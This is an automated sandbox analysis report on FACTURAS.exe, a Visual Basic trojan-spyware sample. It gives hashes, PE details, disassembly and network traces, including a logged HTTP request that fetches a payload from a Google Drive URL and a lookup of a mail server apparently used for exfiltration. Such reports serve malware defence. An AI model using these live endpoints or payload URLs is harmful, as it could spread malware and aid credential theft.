                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:527918
                                Start date:24.11.2021
                                Start time:15:38:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 13m 10s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:FACTURAS.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                Run name:Suspected Instruction Hammering
                                Number of analysed new started processes analysed:25
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@7/2@3/3
                                EGA Information:Failed
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 98%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe, MusNotificationUx.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 20.54.89.15, 52.152.108.96, 52.152.110.14, 20.54.122.82, 51.105.236.244
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, fe3.delivery.mp.microsoft.com, wdcpalt.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, continuum.dds.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, activity.windows.com, nexusrules.officeapps.live.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                15:40:51API Interceptor2621x Sleep call for process: CasPol.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                116.202.203.61sG98fX27l7.exeGet hashmaliciousBrowse
                                  BBVA-Confirming Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                    ejecutable.exeGet hashmaliciousBrowse
                                      TT COPY.exeGet hashmaliciousBrowse
                                        PEDIDO.exeGet hashmaliciousBrowse
                                          Request Quotation.exeGet hashmaliciousBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            HETZNER-ASDEwE3YzRd1IZ.exeGet hashmaliciousBrowse
                                            • 135.181.163.109
                                            wCkjCMnGrOGet hashmaliciousBrowse
                                            • 116.203.73.1
                                            79GRrdea5l.exeGet hashmaliciousBrowse
                                            • 159.69.123.221
                                            MtCsSK9TK2.exeGet hashmaliciousBrowse
                                            • 95.216.4.252
                                            0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousBrowse
                                            • 5.9.164.117
                                            C54CA1DF46D817348C9BDF18F857459D7CA05C51F7F30.exeGet hashmaliciousBrowse
                                            • 135.181.129.119
                                            6D2FF3CC83EA214E33E4105CCB1051CD85B82E052F615.exeGet hashmaliciousBrowse
                                            • 5.9.162.45
                                            j0UcwcqjvM.exeGet hashmaliciousBrowse
                                            • 5.9.162.45
                                            0K31jgS20G.exeGet hashmaliciousBrowse
                                            • 5.9.162.45
                                            vAsfZhw32P.exeGet hashmaliciousBrowse
                                            • 5.9.162.45
                                            YwZpT3p5Rh.msiGet hashmaliciousBrowse
                                            • 88.99.32.114
                                            FhP4JYCU7J.exeGet hashmaliciousBrowse
                                            • 5.9.162.45
                                            ugeLMlEROB.exeGet hashmaliciousBrowse
                                            • 116.202.14.219
                                            FhP4JYCU7J.exeGet hashmaliciousBrowse
                                            • 5.9.162.45
                                            44E401AAF0B52528AA033257C1A1B8A09A2B10EDF26ED.exeGet hashmaliciousBrowse
                                            • 5.9.162.45
                                            77012C024869BA2639B54B959FAB1E10EBAAF8EBB9BFC.exeGet hashmaliciousBrowse
                                            • 5.9.162.45
                                            EK8RByS6rz.apkGet hashmaliciousBrowse
                                            • 168.119.120.243
                                            Ordine_di_acquisto_6010921doc.vbsGet hashmaliciousBrowse
                                            • 144.76.136.153
                                            WQRrng5aiw.exeGet hashmaliciousBrowse
                                            • 5.9.162.45
                                            WQRrng5aiw.exeGet hashmaliciousBrowse
                                            • 5.9.162.45

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            37f463bf4616ecd445d4a1937da06e19new-1179494065.xlsGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            TT-PRIME USD242,357,59.ppamGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            chase.xlsGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            Statement from QNB.exeGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            private-1915056036.xlsGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            private-1910485378.xlsGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            doc201002124110300200.exeGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            t 2021.HtMLGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            Justificante.exeGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            muhammadbad.htmlGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            MtCsSK9TK2.exeGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            6D2FF3CC83EA214E33E4105CCB1051CD85B82E052F615.exeGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            vAsfZhw32P.exeGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            FpYf5EGDO9.exeGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            #U0191ACTU#U0156A_unxsxdxX_f_mMT_312.vbsGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206
                                            FhP4JYCU7J.exeGet hashmaliciousBrowse
                                            • 172.217.16.129
                                            • 142.250.184.206

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Temp\~DF31A7F5A6505F20A0.TMP
                                            Process:C:\Users\user\Desktop\FACTURAS.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):16384
                                            Entropy (8bit):0.9277305547216628
                                            Encrypted:false
                                            SSDEEP:48:rJSq2Upu8metqPrIXHimU7zdvP1vncU7pCr8P:VSKUpACLFcUVCrG
                                            MD5:19809EDD1FF00A1D7C105BC58A97CD02
                                            SHA1:26FB6D339CF2A7474DE6F785166163FA9B2ADBB1
                                            SHA-256:4745D04A4BB99D70866D722394D9E71F3FAE597AA84E229A1E3B40F31521594C
                                            SHA-512:434722936006B56B042FB5C72CAB98D8B7615A5A0E48EE6746DD6839BE029029E3BCECF7EFA49DDC8A9DB016FA472FB9EE1CE75126C13E06D66EAA12166A38F7
                                            Malicious:false
                                            Reputation:low
                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            \Device\ConDrv
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):30
                                            Entropy (8bit):3.964735178725505
                                            Encrypted:false
                                            SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                            MD5:9F754B47B351EF0FC32527B541420595
                                            SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                            SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                            SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: NordVPN directory not found!..

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):4.736694563648511
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.15%
                                            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:FACTURAS.exe
                                            File size:135168
                                            MD5:ab63f9ba38d9eb4f8bd57ae56a844a31
                                            SHA1:bf1c2a15553f893ff180a307dcb5805c6e440158
                                            SHA256:5d14499fc44a623454a0518972ba97be883b0394f16f08b4265e46ff12ebfeb3
                                            SHA512:a8a0d1040432cffc40aaaee619a28703c731b9f3c809db6d915521424a3b4394f3ed46c37c9d7cdd2903d2c8aa33cb9ce87b50acc79de30aa4fbc80b6b264f36
                                            SSDEEP:1536:t7Do180f9y+zVLdUAcAyB/BMsZWU1/7nYp4r1O/pejim0SD:t7gZz7RcAy/Vkm7nYCr1Omim0S
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L...#..K.....................0....................@........

                                            File Icon

                                            Icon Hash:981dca909cee36b0

                                            Static PE Info

                                            General

                                            Entrypoint:0x4013b4
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                            DLL Characteristics:
                                            Time Stamp:0x4BCC8F23 [Mon Apr 19 17:13:07 2010 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:d77040f4614bccfda7b8aa2e04863738

                                            Entrypoint Preview

                                            Instruction
                                            push 00401FD0h
                                            call 00007F59A4C297F5h
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            xor byte ptr [eax], al
                                            add byte ptr [eax], al
                                            cmp byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            push ecx
                                            sahf
                                            cmp ebx, esp
                                            sub dword ptr [ecx+69h], ecx
                                            inc esp
                                            sahf
                                            fild qword ptr [ebx-74h]
                                            jnp 00007F59A4C29839h
                                            in eax, 54h
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add dword ptr [eax], eax
                                            add byte ptr [eax], al
                                            inc ecx
                                            add al, dh
                                            pop es
                                            inc ecx
                                            add byte ptr [ecx+ebp*2+6Ch], dl
                                            insb
                                            jns 00007F59A4C29875h
                                            xor dword ptr [eax], eax
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            dec esp
                                            xor dword ptr [eax], eax
                                            add eax, E27047BEh
                                            sbb eax, ebx
                                            push cs
                                            inc esp
                                            xchg eax, esp
                                            push FFFFFFCDh
                                            iretd
                                            dec ecx
                                            mov dl, FEh
                                            imul eax, dword ptr [esi-081F81EBh], 3Dh
                                            adc cl, byte ptr [esi-62h]
                                            ror byte ptr [ebx], 1
                                            xor eax, FD7A371Dh
                                            cmp cl, byte ptr [edi-53h]
                                            xor ebx, dword ptr [ecx-48EE309Ah]
                                            or al, 00h
                                            stosb
                                            add byte ptr [eax-2Dh], ah
                                            xchg eax, ebx
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            clc
                                            or dword ptr [eax], eax
                                            add byte ptr [ebx], bl
                                            or dword ptr [eax], eax
                                            add byte ptr [eax], al
                                            or al, byte ptr [eax]
                                            push ebx
                                            popad
                                            insd
                                            popad
                                            jc 00007F59A4C2986Bh
                                            jne 00007F59A4C2986Fh
                                            jnc 00007F59A4C29835h
                                            add byte ptr [4F000D01h], cl
                                            jc 00007F59A4C29866h
                                            outsb
                                            jnc 00007F59A4C2986Dh
                                            popad
                                            jo 00007F59A4C2986Bh
                                            je 00007F59A4C29867h

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1dc040x28.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x210000xf40.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x11c.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x1d10c0x1e000False0.344938151042data4.91647345609IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .data0x1f0000x141c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .rsrc0x210000xf400x1000False0.337158203125data3.27489444604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            CUSTOM0x21e020x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
                                            CUSTOM0x21cc40x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
                                            RT_ICON0x2141c0x8a8data
                                            RT_GROUP_ICON0x214080x14data
                                            RT_VERSION0x211700x298dataTurkmenTurkmenistan

                                            Imports

                                            DLLImport
                                            MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaRecDestruct, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, __vbaRecUniToAnsi, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaInStr, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, __vbaRecDestructAnsi, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                            Version Infos

                                            DescriptionData
                                            Translation0x0442 0x04b0
                                            LegalCopyrightLips
                                            InternalNameGILDER
                                            FileVersion1.00
                                            CompanyNameLips
                                            LegalTrademarksLips
                                            ProductNameLips
                                            ProductVersion1.00
                                            FileDescriptionLips
                                            OriginalFilenameGILDER.exe

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States
                                            TurkmenTurkmenistan

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 24, 2021 15:40:41.942888975 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:41.942971945 CET44349792142.250.184.206192.168.11.20
                                            Nov 24, 2021 15:40:41.943711042 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:41.968472004 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:41.968522072 CET44349792142.250.184.206192.168.11.20
                                            Nov 24, 2021 15:40:42.018415928 CET44349792142.250.184.206192.168.11.20
                                            Nov 24, 2021 15:40:42.018591881 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:42.018604994 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:42.019957066 CET44349792142.250.184.206192.168.11.20
                                            Nov 24, 2021 15:40:42.020136118 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:42.178617954 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:42.178670883 CET44349792142.250.184.206192.168.11.20
                                            Nov 24, 2021 15:40:42.179441929 CET44349792142.250.184.206192.168.11.20
                                            Nov 24, 2021 15:40:42.179563999 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:42.190728903 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:42.231853008 CET44349792142.250.184.206192.168.11.20
                                            Nov 24, 2021 15:40:42.585907936 CET44349792142.250.184.206192.168.11.20
                                            Nov 24, 2021 15:40:42.586169004 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:42.586251020 CET44349792142.250.184.206192.168.11.20
                                            Nov 24, 2021 15:40:42.586416006 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:42.586452007 CET44349792142.250.184.206192.168.11.20
                                            Nov 24, 2021 15:40:42.586559057 CET44349792142.250.184.206192.168.11.20
                                            Nov 24, 2021 15:40:42.586662054 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:42.586709976 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:42.591912985 CET49792443192.168.11.20142.250.184.206
                                            Nov 24, 2021 15:40:42.592025995 CET44349792142.250.184.206192.168.11.20
                                            Nov 24, 2021 15:40:42.662516117 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.662594080 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.662771940 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.663095951 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.663136005 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.715188026 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.715374947 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.715430021 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.716922998 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.717097044 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.717252016 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.722619057 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.722634077 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.722887039 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.723074913 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.723499060 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.763851881 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.928837061 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.929042101 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.929373026 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.929653883 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.930124998 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.930321932 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.930354118 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.931921005 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.932096004 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.932142019 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.932172060 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.932391882 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.933316946 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.933597088 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.933646917 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.933929920 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.939762115 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.939945936 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.940021038 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.940092087 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.940213919 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.940267086 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.940279007 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.940500975 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.940656900 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.940860987 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.940908909 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.941104889 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.941404104 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.941694021 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.941741943 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.942028999 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.942147017 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.942306042 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.942358971 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.942554951 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.942895889 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.943034887 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.943068981 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.943316936 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.943633080 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.943789959 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.943837881 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.944036007 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.944442987 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.944632053 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.944679022 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.944930077 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.945152998 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.945353031 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.945401907 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.945687056 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.945893049 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.946058989 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.946105003 CET44349793172.217.16.129192.168.11.20
                                            Nov 24, 2021 15:40:42.946377993 CET49793443192.168.11.20172.217.16.129
                                            Nov 24, 2021 15:40:42.946582079 CET44349793172.217.16.129192.168.11.20

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 24, 2021 15:40:41.917900085 CET6416853192.168.11.201.1.1.1
                                            Nov 24, 2021 15:40:41.927542925 CET53641681.1.1.1192.168.11.20
                                            Nov 24, 2021 15:40:42.649125099 CET5689153192.168.11.201.1.1.1
                                            Nov 24, 2021 15:40:42.661078930 CET53568911.1.1.1192.168.11.20
                                            Nov 24, 2021 15:42:18.006700993 CET5192853192.168.11.201.1.1.1
                                            Nov 24, 2021 15:42:18.239960909 CET53519281.1.1.1192.168.11.20

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Nov 24, 2021 15:40:41.917900085 CET192.168.11.201.1.1.10x9c72Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                            Nov 24, 2021 15:40:42.649125099 CET192.168.11.201.1.1.10xfc38Standard query (0)doc-08-5k-docs.googleusercontent.comA (IP address)IN (0x0001)
                                            Nov 24, 2021 15:42:18.006700993 CET192.168.11.201.1.1.10xdf12Standard query (0)mail.furteksdokuma.com.trA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Nov 24, 2021 15:40:41.927542925 CET1.1.1.1192.168.11.200x9c72No error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)
                                            Nov 24, 2021 15:40:42.661078930 CET1.1.1.1192.168.11.200xfc38No error (0)doc-08-5k-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                            Nov 24, 2021 15:40:42.661078930 CET1.1.1.1192.168.11.200xfc38No error (0)googlehosted.l.googleusercontent.com172.217.16.129A (IP address)IN (0x0001)
                                            Nov 24, 2021 15:42:18.239960909 CET1.1.1.1192.168.11.200xdf12No error (0)mail.furteksdokuma.com.trfurteksdokuma.com.trCNAME (Canonical name)IN (0x0001)
                                            Nov 24, 2021 15:42:18.239960909 CET1.1.1.1192.168.11.200xdf12No error (0)furteksdokuma.com.tr116.202.203.61A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • drive.google.com
                                            • doc-08-5k-docs.googleusercontent.com

                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.11.2049792142.250.184.206443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-11-24 14:40:42 UTC0OUTGET /uc?export=download&id=150165GSkz9-m3FahfFvn26gkuLRySZPu HTTP/1.1
